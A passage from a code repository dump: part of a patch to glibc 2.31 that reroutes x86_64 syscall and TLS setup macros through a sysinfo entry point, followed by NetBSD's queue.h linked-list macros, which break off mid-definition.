\ 736 | + TYPEFY (arg6, __arg6) = ARGIFY (arg6); \ 737 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 738 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 739 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 740 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 741 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 742 | + register TYPEFY (arg6, _a6) asm ("r9") = __arg6; \ 743 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 744 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 745 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 746 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 747 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 748 | + asm volatile ( \ 749 | + "call *%%fs:%P2\n\t" \ 750 | + : "=a" (resultvar) \ 751 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 752 | + "r" (_a5), "r" (_a6) \ 753 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 754 | + (long int) resultvar; \ 755 | +}) 756 | +/*# else // not shared 757 | +#undef internal_syscall0 758 | +#define internal_syscall0(number, err, dummy...) \ 759 | +({ \ 760 | + unsigned long int resultvar; \ 761 | + asm volatile ( \ 762 | + "call *_dl_sysinfo\n\t" \ 763 | + : "=a" (resultvar) \ 764 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)) \ 765 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 766 | + (long int) resultvar; \ 767 | +}) 768 | + 769 | +#undef internal_syscall1 770 | +#define internal_syscall1(number, err, arg1) \ 771 | +({ \ 772 | + unsigned long int resultvar; \ 773 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 774 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 775 | + asm volatile ( \ 776 | + "call *_dl_sysinfo\n\t" \ 777 | + : "=a" (resultvar) \ 778 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1) \ 779 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 780 | + (long int) resultvar; \ 781 | +}) 782 | + 783 | +#undef internal_syscall2 784 | +#define internal_syscall2(number, err, arg1, arg2) \ 785 | +({ \ 786 | + unsigned long int resultvar; \ 787 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 788 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 789 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 790 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 791 | + asm volatile ( \ 792 | + "call *_dl_sysinfo\n\t" \ 793 | + : "=a" (resultvar) \ 794 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2) \ 795 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 796 | + (long int) resultvar; \ 797 | +}) 798 | + 799 | +#undef internal_syscall3 800 | +#define internal_syscall3(number, err, arg1, arg2, arg3) \ 801 | +({ \ 802 | + unsigned long int resultvar; \ 803 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 804 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 805 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 806 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 807 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 808 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 809 | + asm volatile ( \ 810 | + "call *_dl_sysinfo\n\t" \ 811 | + : "=a" (resultvar) \ 812 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3) \ 813 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 814 | + (long int) resultvar; \ 815 | +}) 816 | + 817 | +#undef internal_syscall4 818 | +#define internal_syscall4(number, err, arg1, arg2, arg3, arg4) \ 819 | +({ \ 820 | + unsigned long int resultvar; \ 821 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 822 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 823 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 824 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 825 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 826 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 827 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 828 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 829 | + asm volatile ( \ 830 | + "call *_dl_sysinfo\n\t" \ 831 | + : "=a" (resultvar) \ 832 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4) \ 833 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 834 | + (long int) resultvar; \ 835 | +}) 836 | + 837 | +#undef internal_syscall5 838 | +#define internal_syscall5(number, err, arg1, arg2, arg3, arg4, arg5) \ 839 | +({ \ 840 | + unsigned long int resultvar; \ 841 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 842 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 843 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 844 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 845 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 846 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 847 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 848 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 849 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 850 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 851 | + asm volatile ( \ 852 | + "call *_dl_sysinfo\n\t" \ 853 | + : "=a" (resultvar) \ 854 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 855 | + "r" (_a5) \ 856 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 857 | + (long int) resultvar; \ 858 | +}) 859 | + 860 | +#undef internal_syscall6 861 | +#define internal_syscall6(number, err, arg1, arg2, arg3, arg4, arg5, arg6) \ 862 | +({ \ 863 | + unsigned long int resultvar; \ 864 | + TYPEFY (arg6, __arg6) = ARGIFY (arg6); \ 865 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 866 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 867 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 868 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 869 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 870 | + register TYPEFY (arg6, _a6) asm ("r9") = __arg6; \ 871 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 872 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 873 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 874 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 875 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 876 | + asm volatile ( \ 877 | + "call *_dl_sysinfo\n\t" \ 878 | + : "=a" (resultvar) \ 879 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 880 | + "r" (_a5), "r" (_a6) \ 881 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 882 | + (long int) resultvar; \ 883 | +}) 884 | +# endif // end if shared*/ 885 | +# else // not use vsycall 886 | #undef internal_syscall0 887 | #define internal_syscall0(number, err, dummy...) \ 888 | ({ \ 889 | @@ -352,6 +788,7 @@ 890 | : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 891 | (long int) resultvar; \ 892 | }) 893 | +#endif // end if use vsycall 894 | 895 | # undef INTERNAL_SYSCALL_ERROR_P 896 | # define INTERNAL_SYSCALL_ERROR_P(val, err) \ 897 | diff -urN glibc-2.31_base/sysdeps/x86_64/nptl/tcb-offsets.sym glibc-2.31_pre_tls/sysdeps/x86_64/nptl/tcb-offsets.sym 898 | --- glibc-2.31_base/sysdeps/x86_64/nptl/tcb-offsets.sym 2020-02-01 12:52:50.000000000 +0100 899 | +++ glibc-2.31_pre_tls/sysdeps/x86_64/nptl/tcb-offsets.sym 2022-01-26 10:31:38.000000000 +0100 900 | @@ -12,6 +12,7 @@ 901 | MULTIPLE_THREADS_OFFSET offsetof (tcbhead_t, multiple_threads) 902 | POINTER_GUARD offsetof (tcbhead_t, pointer_guard) 903 | VGETCPU_CACHE_OFFSET offsetof (tcbhead_t, vgetcpu_cache) 904 | +SYSINFO_OFFSET offsetof (tcbhead_t, sysinfo) 905 | FEATURE_1_OFFSET offsetof (tcbhead_t, feature_1) 906 | SSP_BASE_OFFSET offsetof (tcbhead_t, ssp_base) 907 | 908 | diff -urN glibc-2.31_base/sysdeps/x86_64/nptl/tls.h glibc-2.31_pre_tls/sysdeps/x86_64/nptl/tls.h 909 | --- glibc-2.31_base/sysdeps/x86_64/nptl/tls.h 2020-02-01 12:52:50.000000000 +0100 910 | +++ glibc-2.31_pre_tls/sysdeps/x86_64/nptl/tls.h 2022-01-26 16:32:32.752959454 +0100 911 | @@ -19,6 +19,7 @@ 912 | #ifndef _TLS_H 913 | #define _TLS_H 1 914 | 915 | +#include 916 | #ifndef __ASSEMBLER__ 917 | # include /* For ARCH_SET_FS. */ 918 | # include 919 | @@ -144,6 +145,13 @@ 920 | # define GET_DTV(descr) \ 921 | (((tcbhead_t *) (descr))->dtv) 922 | 923 | +//#define THREAD_SELF_SYSINFO THREAD_GETMEM (THREAD_SELF, header.sysinfo) 924 | +//#define THREAD_SYSINFO(pd) ((pd)->header.sysinfo) 925 | + 926 | +#ifdef NEED_DL_SYSINFO 927 | +#define SETUP_THREAD_SYSINFO(pd) ((pd)->header.sysinfo = THREAD_GETMEM (THREAD_SELF, header.sysinfo)) 928 | +#define CHECK_THREAD_SYSINFO(pd) assert ((pd)->header.sysinfo == THREAD_GETMEM (THREAD_SELF, header.sysinfo)) 929 | +#endif 930 | 931 | /* Code to initially initialize the thread pointer. This might need 932 | special attention since 'errno' is not yet available and if the 933 | @@ -151,6 +159,31 @@ 934 | 935 | We have to make the syscall for both uses of the macro since the 936 | address might be (and probably is) different. */ 937 | + 938 | +#if defined NEED_DL_SYSINFO 939 | +# define TLS_INIT_TP(thrdescr) \ 940 | + ({ void *_thrdescr = (thrdescr); \ 941 | + tcbhead_t *_head = _thrdescr; \ 942 | + int _result; \ 943 | + \ 944 | + _head->tcb = _thrdescr; \ 945 | + /* For now the thread descriptor is at the same address. */ \ 946 | + _head->self = _thrdescr; \ 947 | + \ 948 | + _head->sysinfo = GLRO(dl_sysinfo); \ 949 | + \ 950 | + /* It is a simple syscall to set the %fs value for the thread. */ \ 951 | + asm volatile ("callq *%4" \ 952 | + : "=a" (_result) \ 953 | + : "0" ((unsigned long int) __NR_arch_prctl), \ 954 | + "D" ((unsigned long int) ARCH_SET_FS), \ 955 | + "S" (_thrdescr), \ 956 | + "m" (_head->sysinfo) \ 957 | + : "memory", "cc", "r11", "cx"); \ 958 | + \ 959 | + _result ? "cannot set %fs base address for thread-local storage" : 0; \ 960 | + }) 961 | +#else 962 | # define TLS_INIT_TP(thrdescr) \ 963 | ({ void *_thrdescr = (thrdescr); \ 964 | tcbhead_t *_head = _thrdescr; \ 965 | @@ -170,6 +203,7 @@ 966 | \ 967 | _result ? "cannot set %fs base address for thread-local storage" : 0; \ 968 | }) 969 | +#endif 970 | 971 | # define TLS_DEFINE_INIT_TP(tp, pd) void *tp = (pd) 972 | 973 | -------------------------------------------------------------------------------- /queue.h: -------------------------------------------------------------------------------- 1 | /* $NetBSD: queue.h,v 1.68 2014/11/19 08:10:01 uebayasi Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 1991, 1993 5 | * The Regents of the University of California. All rights reserved. 6 | * 7 | * Redistribution and use in source and binary forms, with or without 8 | * modification, are permitted provided that the following conditions 9 | * are met: 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 3. Neither the name of the University nor the names of its contributors 16 | * may be used to endorse or promote products derived from this software 17 | * without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 20 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 21 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 22 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 23 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 24 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 25 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 26 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 27 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 28 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 29 | * SUCH DAMAGE. 30 | * 31 | * @(#)queue.h 8.5 (Berkeley) 8/20/94 32 | */ 33 | 34 | #ifndef _BMK_CORE_QUEUE_H_ 35 | #define _BMK_CORE_QUEUE_H_ 36 | 37 | /* 38 | * This file defines five types of data structures: singly-linked lists, 39 | * lists, simple queues, tail queues, and circular queues. 40 | * 41 | * A singly-linked list is headed by a single forward pointer. The 42 | * elements are singly linked for minimum space and pointer manipulation 43 | * overhead at the expense of O(n) removal for arbitrary elements. New 44 | * elements can be added to the list after an existing element or at the 45 | * head of the list. Elements being removed from the head of the list 46 | * should use the explicit macro for this purpose for optimum 47 | * efficiency. A singly-linked list may only be traversed in the forward 48 | * direction. Singly-linked lists are ideal for applications with large 49 | * datasets and few or no removals or for implementing a LIFO queue. 50 | * 51 | * A list is headed by a single forward pointer (or an array of forward 52 | * pointers for a hash table header). The elements are doubly linked 53 | * so that an arbitrary element can be removed without a need to 54 | * traverse the list. New elements can be added to the list before 55 | * or after an existing element or at the head of the list. A list 56 | * may only be traversed in the forward direction. 57 | * 58 | * A simple queue is headed by a pair of pointers, one the head of the 59 | * list and the other to the tail of the list. The elements are singly 60 | * linked to save space, so elements can only be removed from the 61 | * head of the list. New elements can be added to the list after 62 | * an existing element, at the head of the list, or at the end of the 63 | * list. A simple queue may only be traversed in the forward direction. 64 | * 65 | * A tail queue is headed by a pair of pointers, one to the head of the 66 | * list and the other to the tail of the list. The elements are doubly 67 | * linked so that an arbitrary element can be removed without a need to 68 | * traverse the list. New elements can be added to the list before or 69 | * after an existing element, at the head of the list, or at the end of 70 | * the list. A tail queue may be traversed in either direction. 71 | * 72 | * A circle queue is headed by a pair of pointers, one to the head of the 73 | * list and the other to the tail of the list. The elements are doubly 74 | * linked so that an arbitrary element can be removed without a need to 75 | * traverse the list. New elements can be added to the list before or after 76 | * an existing element, at the head of the list, or at the end of the list. 77 | * A circle queue may be traversed in either direction, but has a more 78 | * complex end of list detection. 79 | * 80 | * For details on the use of these macros, see the queue(3) manual page. 81 | */ 82 | 83 | //#include 84 | /* $NetBSD: null.h,v 1.9 2010/07/06 11:56:20 kleink Exp $ */ 85 | 86 | /* 87 | * Written by Klaus Klein , December 22, 1999. 88 | * Public domain. 89 | */ 90 | 91 | #ifndef _BMK_CORE_NULL_H_ 92 | #define _BMK_CORE_NULL_H_ 93 | #ifndef NULL 94 | #if !defined(__GNUG__) || __GNUG__ < 2 || (__GNUG__ == 2 && __GNUC_MINOR__ < 90) 95 | #if !defined(__cplusplus) 96 | #define NULL ((void *)0) 97 | #else 98 | #define NULL 0 99 | #endif /* !__cplusplus */ 100 | #else 101 | #define NULL __null 102 | #endif 103 | #endif 104 | #endif /* _BMK_CORE_NULL_H_ */ 105 | 106 | 107 | #if defined(QUEUEDEBUG) 108 | # if defined(_KERNEL) 109 | # define QUEUEDEBUG_ABORT(...) panic(__VA_ARGS__) 110 | # else 111 | # include 112 | # define QUEUEDEBUG_ABORT(...) err(1, __VA_ARGS__) 113 | # endif 114 | #endif 115 | 116 | /* 117 | * Singly-linked List definitions. 118 | */ 119 | #define SLIST_HEAD(name, type) \ 120 | struct name { \ 121 | struct type *slh_first; /* first element */ \ 122 | } 123 | 124 | #define SLIST_HEAD_INITIALIZER(head) \ 125 | { NULL } 126 | 127 | #define SLIST_ENTRY(type) \ 128 | struct { \ 129 | struct type *sle_next; /* next element */ \ 130 | } 131 | 132 | /* 133 | * Singly-linked List access methods. 134 | */ 135 | #define SLIST_FIRST(head) ((head)->slh_first) 136 | #define SLIST_END(head) NULL 137 | #define SLIST_EMPTY(head) ((head)->slh_first == NULL) 138 | #define SLIST_NEXT(elm, field) ((elm)->field.sle_next) 139 | 140 | #define SLIST_FOREACH(var, head, field) \ 141 | for((var) = (head)->slh_first; \ 142 | (var) != SLIST_END(head); \ 143 | (var) = (var)->field.sle_next) 144 | 145 | #define SLIST_FOREACH_SAFE(var, head, field, tvar) \ 146 | for ((var) = SLIST_FIRST((head)); \ 147 | (var) != SLIST_END(head) && \ 148 | ((tvar) = SLIST_NEXT((var), field), 1); \ 149 | (var) = (tvar)) 150 | 151 | /* 152 | * Singly-linked List functions. 153 | */ 154 | #define SLIST_INIT(head) do { \ 155 | (head)->slh_first = SLIST_END(head); \ 156 | } while (/*CONSTCOND*/0) 157 | 158 | #define SLIST_INSERT_AFTER(slistelm, elm, field) do { \ 159 | (elm)->field.sle_next = (slistelm)->field.sle_next; \ 160 | (slistelm)->field.sle_next = (elm); \ 161 | } while (/*CONSTCOND*/0) 162 | 163 | #define SLIST_INSERT_HEAD(head, elm, field) do { \ 164 | (elm)->field.sle_next = (head)->slh_first; \ 165 | (head)->slh_first = (elm); \ 166 | } while (/*CONSTCOND*/0) 167 | 168 | #define SLIST_REMOVE_AFTER(slistelm, field) do { \ 169 | (slistelm)->field.sle_next = \ 170 | SLIST_NEXT(SLIST_NEXT((slistelm), field), field); \ 171 | } while (/*CONSTCOND*/0) 172 | 173 | #define SLIST_REMOVE_HEAD(head, field) do { \ 174 | (head)->slh_first = (head)->slh_first->field.sle_next; \ 175 | } while (/*CONSTCOND*/0) 176 | 177 | #define SLIST_REMOVE(head, elm, type, field) do { \ 178 | if ((head)->slh_first == (elm)) { \ 179 | SLIST_REMOVE_HEAD((head), field); \ 180 | } \ 181 | else { \ 182 | struct type *curelm = (head)->slh_first; \ 183 | while(curelm->field.sle_next != (elm)) \ 184 | curelm = curelm->field.sle_next; \ 185 | curelm->field.sle_next = \ 186 | curelm->field.sle_next->field.sle_next; \ 187 | } \ 188 | } while (/*CONSTCOND*/0) 189 | 190 | 191 | /* 192 | * List definitions. 193 | */ 194 | #define LIST_HEAD(name, type) \ 195 | struct name { \ 196 | struct type *lh_first; /* first element */ \ 197 | } 198 | 199 | #define LIST_HEAD_INITIALIZER(head) \ 200 | { NULL } 201 | 202 | #define LIST_ENTRY(type) \ 203 | struct { \ 204 | struct type *le_next; /* next element */ \ 205 | struct type **le_prev; /* address of previous next element */ \ 206 | } 207 | 208 | /* 209 | * List access methods. 210 | */ 211 | #define LIST_FIRST(head) ((head)->lh_first) 212 | #define LIST_END(head) NULL 213 | #define LIST_EMPTY(head) ((head)->lh_first == LIST_END(head)) 214 | #define LIST_NEXT(elm, field) ((elm)->field.le_next) 215 | 216 | #define LIST_FOREACH(var, head, field) \ 217 | for ((var) = ((head)->lh_first); \ 218 | (var) != LIST_END(head); \ 219 | (var) = ((var)->field.le_next)) 220 | 221 | #define LIST_FOREACH_SAFE(var, head, field, tvar) \ 222 | for ((var) = LIST_FIRST((head)); \ 223 | (var) != LIST_END(head) && \ 224 | ((tvar) = LIST_NEXT((var), field), 1); \ 225 | (var) = (tvar)) 226 | 227 | #define LIST_MOVE(head1, head2) do { \ 228 | LIST_INIT((head2)); \ 229 | if (!LIST_EMPTY((head1))) { \ 230 | (head2)->lh_first = (head1)->lh_first; \ 231 | LIST_INIT((head1)); \ 232 | } \ 233 | } while (/*CONSTCOND*/0) 234 | 235 | /* 236 | * List functions. 237 | */ 238 | #if defined(QUEUEDEBUG) 239 | #define QUEUEDEBUG_LIST_INSERT_HEAD(head, elm, field) \ 240 | if ((head)->lh_first && \ 241 | (head)->lh_first->field.le_prev != &(head)->lh_first) \ 242 | QUEUEDEBUG_ABORT("LIST_INSERT_HEAD %p %s:%d", (head), \ 243 | __FILE__, __LINE__); 244 | #define QUEUEDEBUG_LIST_OP(elm, field) \ 245 | if ((elm)->field.le_next && \ 246 | (elm)->field.le_next->field.le_prev != \ 247 | &(elm)->field.le_next) \ 248 | QUEUEDEBUG_ABORT("LIST_* forw %p %s:%d", (elm), \ 249 | __FILE__, __LINE__); \ 250 | if (*(elm)->field.le_prev != (elm)) \ 251 | QUEUEDEBUG_ABORT("LIST_* back %p %s:%d", (elm), \ 252 | __FILE__, __LINE__); 253 | #define QUEUEDEBUG_LIST_POSTREMOVE(elm, field) \ 254 | (elm)->field.le_next = (void *)1L; \ 255 | (elm)->field.le_prev = (void *)1L; 256 | #else 257 | #define QUEUEDEBUG_LIST_INSERT_HEAD(head, elm, field) 258 | #define QUEUEDEBUG_LIST_OP(elm, field) 259 | #define QUEUEDEBUG_LIST_POSTREMOVE(elm, field) 260 | #endif 261 | 262 | #define LIST_INIT(head) do { \ 263 | (head)->lh_first = LIST_END(head); \ 264 | } while (/*CONSTCOND*/0) 265 | 266 | #define LIST_INSERT_AFTER(listelm, elm, field) do { \ 267 | QUEUEDEBUG_LIST_OP((listelm), field) \ 268 | if (((elm)->field.le_next = (listelm)->field.le_next) != \ 269 | LIST_END(head)) \ 270 | (listelm)->field.le_next->field.le_prev = \ 271 | &(elm)->field.le_next; \ 272 | (listelm)->field.le_next = (elm); \ 273 | (elm)->field.le_prev = &(listelm)->field.le_next; \ 274 | } while (/*CONSTCOND*/0) 275 | 276 | #define LIST_INSERT_BEFORE(listelm, elm, field) do { \ 277 | QUEUEDEBUG_LIST_OP((listelm), field) \ 278 | (elm)->field.le_prev = (listelm)->field.le_prev; \ 279 | (elm)->field.le_next = (listelm); \ 280 | *(listelm)->field.le_prev = (elm); \ 281 | (listelm)->field.le_prev = &(elm)->field.le_next; \ 282 | } while (/*CONSTCOND*/0) 283 | 284 | #define LIST_INSERT_HEAD(head, elm, field) do { \ 285 | QUEUEDEBUG_LIST_INSERT_HEAD((head), (elm), field) \ 286 | if (((elm)->field.le_next = (head)->lh_first) != LIST_END(head))\ 287 | (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ 288 | (head)->lh_first = (elm); \ 289 | (elm)->field.le_prev = &(head)->lh_first; \ 290 | } while (/*CONSTCOND*/0) 291 | 292 | #define LIST_REMOVE(elm, field) do { \ 293 | QUEUEDEBUG_LIST_OP((elm), field) \ 294 | if ((elm)->field.le_next != NULL) \ 295 | (elm)->field.le_next->field.le_prev = \ 296 | (elm)->field.le_prev; \ 297 | *(elm)->field.le_prev = (elm)->field.le_next; \ 298 | QUEUEDEBUG_LIST_POSTREMOVE((elm), field) \ 299 | } while (/*CONSTCOND*/0) 300 | 301 | #define LIST_REPLACE(elm, elm2, field) do { \ 302 | if (((elm2)->field.le_next = (elm)->field.le_next) != NULL) \ 303 | (elm2)->field.le_next->field.le_prev = \ 304 | &(elm2)->field.le_next; \ 305 | (elm2)->field.le_prev = (elm)->field.le_prev; \ 306 | *(elm2)->field.le_prev = (elm2); \ 307 | QUEUEDEBUG_LIST_POSTREMOVE((elm), field) \ 308 | } while (/*CONSTCOND*/0) 309 | 310 | /* 311 | * Simple queue definitions. 312 | */ 313 | #define SIMPLEQ_HEAD(name, type) \ 314 | struct name { \ 315 | struct type *sqh_first; /* first element */ \ 316 | struct type **sqh_last; /* addr of last next element */ \ 317 | } 318 | 319 | #define SIMPLEQ_HEAD_INITIALIZER(head) \ 320 | { NULL, &(head).sqh_first } 321 | 322 | #define SIMPLEQ_ENTRY(type) \ 323 | struct { \ 324 | struct type *sqe_next; /* next element */ \ 325 | } 326 | 327 | /* 328 | * Simple queue access methods. 329 | */ 330 | #define SIMPLEQ_FIRST(head) ((head)->sqh_first) 331 | #define SIMPLEQ_END(head) NULL 332 | #define SIMPLEQ_EMPTY(head) ((head)->sqh_first == SIMPLEQ_END(head)) 333 | #define SIMPLEQ_NEXT(elm, field) ((elm)->field.sqe_next) 334 | 335 | #define SIMPLEQ_FOREACH(var, head, field) \ 336 | for ((var) = ((head)->sqh_first); \ 337 | (var) != SIMPLEQ_END(head); \ 338 | (var) = ((var)->field.sqe_next)) 339 | 340 | #define SIMPLEQ_FOREACH_SAFE(var, head, field, next) \ 341 | for ((var) = ((head)->sqh_first); \ 342 | (var) != SIMPLEQ_END(head) && \ 343 | ((next = ((var)->field.sqe_next)), 1); \ 344 | (var) = (next)) 345 | 346 | /* 347 | * Simple queue functions. 348 | */ 349 | #define SIMPLEQ_INIT(head) do { \ 350 | (head)->sqh_first = NULL; \ 351 | (head)->sqh_last = &(head)->sqh_first; \ 352 | } while (/*CONSTCOND*/0) 353 | 354 | #define SIMPLEQ_INSERT_HEAD(head, elm, field) do { \ 355 | if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ 356 | (head)->sqh_last = &(elm)->field.sqe_next; \ 357 | (head)->sqh_first = (elm); \ 358 | } while (/*CONSTCOND*/0) 359 | 360 | #define SIMPLEQ_INSERT_TAIL(head, elm, field) do { \ 361 | (elm)->field.sqe_next = NULL; \ 362 | *(head)->sqh_last = (elm); \ 363 | (head)->sqh_last = &(elm)->field.sqe_next; \ 364 | } while (/*CONSTCOND*/0) 365 | 366 | #define SIMPLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ 367 | if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL)\ 368 | (head)->sqh_last = &(elm)->field.sqe_next; \ 369 | (listelm)->field.sqe_next = (elm); \ 370 | } while (/*CONSTCOND*/0) 371 | 372 | #define SIMPLEQ_REMOVE_HEAD(head, field) do { \ 373 | if (((head)->sqh_first = (head)->sqh_first->field.sqe_next) == NULL) \ 374 | (head)->sqh_last = &(head)->sqh_first; \ 375 | } while (/*CONSTCOND*/0) 376 | 377 | #define SIMPLEQ_REMOVE_AFTER(head, elm, field) do { \ 378 | if (((elm)->field.sqe_next = (elm)->field.sqe_next->field.sqe_next) \ 379 | == NULL) \ 380 | (head)->sqh_last = &(elm)->field.sqe_next; \ 381 | } while (/*CONSTCOND*/0) 382 | 383 | #define SIMPLEQ_REMOVE(head, elm, type, field) do { \ 384 | if ((head)->sqh_first == (elm)) { \ 385 | SIMPLEQ_REMOVE_HEAD((head), field); \ 386 | } else { \ 387 | struct type *curelm = (head)->sqh_first; \ 388 | while (curelm->field.sqe_next != (elm)) \ 389 | curelm = curelm->field.sqe_next; \ 390 | if ((curelm->field.sqe_next = \ 391 | curelm->field.sqe_next->field.sqe_next) == NULL) \ 392 | (head)->sqh_last = &(curelm)->field.sqe_next; \ 393 | } \ 394 | } while (/*CONSTCOND*/0) 395 | 396 | #define SIMPLEQ_CONCAT(head1, head2) do { \ 397 | if (!SIMPLEQ_EMPTY((head2))) { \ 398 | *(head1)->sqh_last = (head2)->sqh_first; \ 399 | (head1)->sqh_last = (head2)->sqh_last; \ 400 | SIMPLEQ_INIT((head2)); \ 401 | } \ 402 | } while (/*CONSTCOND*/0) 403 | 404 | #define SIMPLEQ_LAST(head, type, field) \ 405 | (SIMPLEQ_EMPTY((head)) ? \ 406 | NULL : \ 407 | ((struct type *)(void *) \ 408 | ((char *)((head)->sqh_last) - offsetof(struct type, field)))) 409 | 410 | /* 411 | * Tail queue definitions. 412 | */ 413 | #define _TAILQ_HEAD(name, type, qual) \ 414 | struct name { \ 415 | qual type *tqh_first; /* first element */ \ 416 | qual type *qual *tqh_last; /* addr of last next element */ \ 417 | } 418 | #define TAILQ_HEAD(name, type) _TAILQ_HEAD(name, struct type,) 419 | 420 | #define TAILQ_HEAD_INITIALIZER(head) \ 421 | { TAILQ_END(head), &(head).tqh_first } 422 | 423 | #define _TAILQ_ENTRY(type, qual) \ 424 | struct { \ 425 | qual type *tqe_next; /* next element */ \ 426 | qual type *qual *tqe_prev; /* address of previous next element */\ 427 | } 428 | #define TAILQ_ENTRY(type) _TAILQ_ENTRY(struct type,) 429 | 430 | /* 431 | * Tail queue access methods. 432 | */ 433 | #define TAILQ_FIRST(head) ((head)->tqh_first) 434 | #define TAILQ_END(head) (NULL) 435 | #define TAILQ_NEXT(elm, field) ((elm)->field.tqe_next) 436 | #define TAILQ_LAST(head, headname) \ 437 | (*(((struct headname *)((head)->tqh_last))->tqh_last)) 438 | #define TAILQ_PREV(elm, headname, field) \ 439 | (*(((struct headname *)((elm)->field.tqe_prev))->tqh_last)) 440 | #define TAILQ_EMPTY(head) (TAILQ_FIRST(head) == TAILQ_END(head)) 441 | 442 | 443 | #define 